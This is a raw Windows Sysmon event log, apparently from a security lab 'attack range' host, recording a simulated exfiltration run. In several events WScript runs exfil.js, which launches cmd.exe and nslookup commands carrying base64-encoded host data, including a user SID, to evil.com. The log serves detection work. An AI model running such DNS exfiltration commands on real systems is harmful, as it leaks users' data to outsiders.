14:16:24.012{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.012{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.012{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.012{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.012{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B8-629A-8A3F-000000005F02}7328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.012{2E1864BB-17A1-629A-783D-000000005F02}55524148C:\Windows\System32\WScript.exe{2E1864BB-17B8-629A-8A3F-000000005F02}7328C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.020{2E1864BB-17B8-629A-8A3F-000000005F02}7328C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlavqg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.012{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlssu.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-17B9-629A-C73F-000000005F02}54007172C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-C83F-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C83F-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.982{2E1864BB-17B9-629A-C63F-000000005F02}3712172C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-C83F-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198756Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.984{2E1864BB-17B9-629A-C83F-000000005F02}5696C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-C63F-000000005F02}3712C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwu.tmp 2>&1 10341000x8000000000000000198755Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.967{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-C73F-000000005F02}5400C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198754Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.967{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-C73F-000000005F02}5400C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.950{2E1864BB-17B9-629A-C73F-000000005F02}54007172C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-C63F-000000005F02}3712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C73F-000000005F02}5400C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C63F-000000005F02}3712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-17A1-629A-783D-000000005F02}55525744C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-C63F-000000005F02}3712C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.941{2E1864BB-17B9-629A-C63F-000000005F02}3712C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldwu.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.935{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyzexh.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.903{2E1864BB-17B9-629A-C43F-000000005F02}50487604C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-C53F-000000005F02}4996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 